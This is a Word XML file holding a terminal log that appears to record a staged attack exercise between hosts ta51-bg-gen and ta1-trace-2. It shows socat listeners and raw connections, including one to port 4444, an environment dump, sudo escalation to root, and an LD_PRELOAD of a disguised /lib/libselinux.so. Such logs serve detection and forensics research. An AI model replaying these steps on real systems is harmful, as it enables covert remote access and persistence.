    <w:p w14:paraId="534AD98F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  7.9% of 885.13GB   Swap usage:   3%    Users logged in: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79893776" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20219504" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E8AB4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBE379" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065268C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22899F1D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 17 09:15:27 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A9DDB3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta1-trace-2:~$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AADE6A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D235FCC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ nc -k -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F0667" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E456979" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:8080,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC0872" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CCDD0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67407A94" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB6DB0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ setsid socat TCP4-LISTEN:8080,reuseaddr,fork EXEC:cat &gt;/dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BBE52" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[1] 8849</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E13146" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352C09F8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75874A21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:8080,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6233C86D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>2019/05/17 09:22:02 socat[21558] E connect(5, AF=2 128.55.12.118:8080, 16): Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CE1EC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                              admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:8080,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58942341" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>2019/05/17 09:22:14 socat[21595] E connect(5, AF=2 128.55.12.118:8080, 16): Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46194CA7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                              admin@ta51-bg-gen:~$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E8CEA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0490DC94" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446ADF00" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ netstat -na | grep 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9D68B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[1]+  Done                    setsid socat TCP4-LISTEN:8080,reuseaddr,fork EXEC:cat &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A880A4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5BEDDE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ netstat -na | grep 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC132C5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[1]+  Done                    setsid socat TCP4-LISTEN:8080,reuseaddr,fork EXEC:cat &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5703A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ socat TCP4-LISTEN:8080,reuseaddr,fork EXEC:cat &gt; /dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F57E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ netstat -na | grep 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C3C44" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0E680" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_SESSION_ID=12025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7A89F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TERM=screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469CB9CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05909F61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CLIENT=128.55.12.122 50634 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183EFEAB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_TTY=/dev/pts/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BCA2F7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USER=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C4A417" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7CF56" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIL=/var/mail/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239ECEF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63436CBB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PWD=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF2EF5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LANG=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A92B7E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHLVL=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF66D59" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HOME=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDAA5F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LOGNAME=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E03D0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CONNECTION=128.55.12.122 50634 128.55.12.118 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4FB6E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSOPEN=| /usr/bin/lesspipe %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EA5FF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_RUNTIME_DIR=/run/user/1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2E4DB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSCLOSE=/usr/bin/lesspipe %s %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A26865" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_=/usr/bin/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BC56D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B21E586" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6F3A7F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23D481" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C45CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372EF416" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>su: Authentication failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56BA53" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ sudo -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36BCD2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6A6BF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C67BAC9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275A335" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta1-trace-2:~# export LD_PRELOAD=/lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56032190" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta1-trace-2:~# ldconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B6E13" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2AA3CD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA9B3C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:4444,bind=61040    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D820344" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC449ED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2854FD9D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>l^C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9234E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@ta1-trace-2:~# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07040C43" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta1-trace-2:~# env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41571C5D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E7F433" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TERM=screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E902F40" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LD_PRELOAD=/lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71AB94" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USER=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD01406" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CFA0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SUDO_USER=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31B6AF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SUDO_UID=1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A6257" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USERNAME=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB8CBC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIL=/var/mail/root</w:t>
      </w:r>
    </w:p>
